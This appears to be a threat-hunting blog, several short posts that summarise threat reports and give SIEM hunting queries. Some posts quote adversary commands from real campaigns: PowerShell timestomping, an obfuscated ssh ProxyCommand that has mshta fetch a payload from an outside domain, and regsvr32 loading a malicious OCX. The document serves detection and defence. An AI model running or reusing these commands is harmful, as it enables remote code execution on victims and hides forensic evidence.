Know Your Adversary

Hello everyone! Still adding interesting items to my PowerShell collection! So, in the morning I was reading this report , and spotted another ITW example of abusing PowerShell for timestomping. The adversary created scheduled tasks to execute MeshAgent , and after that executed PowerShell commands to timestomp related files, here are some examples: (Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140_1.dll”).LastWriteTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140_1.dll”).CreationTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140.dll”).LastAccessTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140.dll”).LastWriteTime=(“12 May 2024 11:14:00”) ` (Get-Item “.\vcruntime140.dll”).CreationTime=(“12 May 2024 11:14:00”) For example, we can use ScriptBlock event to hunt for Get-Item cmdlet abuse: event_type: "ScriptExecutionWin" AND script_text: "get-item" AND ("lastaccesstime" OR "lastwr...

Hello everyone! Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger . Both were attributed to the threat actor known as  Golden Chickens . The adversary provides tools to other criminals operating a Malware-as-a-Service (MaaS) platform. I've looked through the report, and (as always) caught a few detection and hunting opportunities. For example, the adversary abused ssh.exe for proxying PowerShell execution: ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')" We can hunt for similar activity using the following query: event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand" Next thing, abusing regsvr32.exe for executing a malicious OCX file: regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx We can use the following query to hunt for OCX...

Hello everyone! We already talked about how adversaries abuse PowerPoint to deliver malware a few times . It's to discuss it again! Seqrite has published a report on APT36 (we track this activity cluster as  Translucent Werewolf )   activity. According to this research, the threat actors leveraged PowerPoint add-on files (PPAM) to deliver Crimson RAT . My observations suggest that such files are not very common in modern environments, so we can hunt for PPAM opening events: event_type: "processcreatewin" AND proc_file_name: "powerpnt.exe" AND cmdline: "ppam" See you tomorrow!

Hello everyone! Reading Trend Micro's report on Earth Kasha , I spotted a curious behavior marker of  ROAMINGMOUSE : it abuses WMI to execute JSLNTOOL.EXE via explorer.exe .  JSLNTOOL.EXE is a legitimate application used by the adversary to sideload  JSFC.dll - a malicious loader. It means we can hunt for suspicious executions of explorer.exe via wmiprvse.exe : event_type: "processcreatewin" AND proc_file_path: "explorer.exe" AND proc_p_file_path: "wmiprvse.exe" As for  JSLNTOOL.EXE , you can also hunt for related execution events, focusing on uncommon locations: event_type: "processcreatewin" AND proc_file_originalfilename: "jslntool.exe" AND NOT proc_file_path: "justsystems" See you tomorrow!